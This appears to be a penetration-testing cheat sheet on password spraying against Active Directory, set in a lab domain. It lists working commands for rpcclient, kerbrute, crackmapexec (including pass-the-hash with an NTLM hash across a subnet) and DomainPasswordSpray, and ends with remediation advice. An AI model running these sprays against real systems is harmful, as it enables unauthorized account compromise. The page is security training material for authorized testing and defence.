# Password Spray
[](https://ko-fi.com/Y8Y41FQ2GA)
{% content-ref url="../protocols/smb-445-139-rpc" %}
[smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc)
{% endcontent-ref %}
Start to identify valid users and check password policy
{% content-ref url="users-identification" %}
[users-identification](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/users-identification)
{% endcontent-ref %}
{% content-ref url="password-policy" %}
[password-policy](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/password-policy)
{% endcontent-ref %}
## Custom Wordlist
LDAPWordListHarvester:
{% embed url="" %}
pyLDAPWordlistHarvester:
{% embed url="" %}
GeoWordlists
{% embed url="" %}
## RPCclient
```shell-session
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
```
## Kerbrute
```shell-session
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
```
## CME
```shell-session
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
```
```
crackmapexec smb 172.16.5.5 -u valid_users.txt -p Welcome1 --continue-on-success
```
Login equal password
```
cme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success
```
### Local admin
```shell-session
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
```
## SprayHound
{% embed url="" %}
## CaptainCredz
{% embed url="" %}
## Conpass- Continuous password spraying tool
{% embed url="" %}
## Powershell - DomainPasswordSpray.ps1
```powershell-session
PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
```
## Spray - Usernames
{% embed url="" %}
## Remediation
The following security controls should be implemented to mitigate password spraying:
* **Create passwords for local administrator accounts, service accounts, and break glass accounts that are long (30-character minimum), unique, unpredictable and managed**. [Microsoft’s Local Administrator Password Solution (LAPS)](https://learn.microsoft.com/en-au/windows-server/identity/laps/laps-overview) can be used to achieve this for local administrator accounts. Using strong passwords reduces the likelihood of successful password spraying.
* **Create passwords used for single-factor authentication that consist of at least four random words with a total minimum length of 15-characters** to reduce the likelihood of a successful password spraying.
* **Lock out user objects, except for break glass accounts, after a maximum of five failed logon attempts.** Enforcing an account lock threshold after five failed authentication attempts reduces the number of possible attempts in password spraying.
* **Ensure passwords created for user objects are randomly generated,** such as when a user object is created, or a user requests a password reset. Malicious actors will try to identify reused passwords and use these in password spraying to increase the likelihood of success.
* **Configure the built-in ‘Administrator’ domain account as sensitive to ensure it cannot be delegated.**
* **Scan networks at least monthly to identify any credentials that are being stored in the clear.** Malicious actors scan networks for cleartext credentials to use in password spraying. Locating and removing these cleartext credentials proactively mitigates this risk.
* **Disable the NTLM protocol.** The NTLM protocol does not support MFA and can be misused by malicious actors to bypass MFA requirements.
{% embed url="" %}
## Interesting Book
{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}
{% hint style="info" %}
***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.*
{% endhint %}
* [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\
Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
* [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\
Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
* [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\
A quick reference when there is no time to scour the Internet for that perfect command
* [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\
The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
* [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\
A practical guide to building a penetration testing program having homefield advantage
## Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
[](https://ko-fi.com/Y8Y41FQ2GA)
[](https://buymeacoffee.com/0xss0rz)
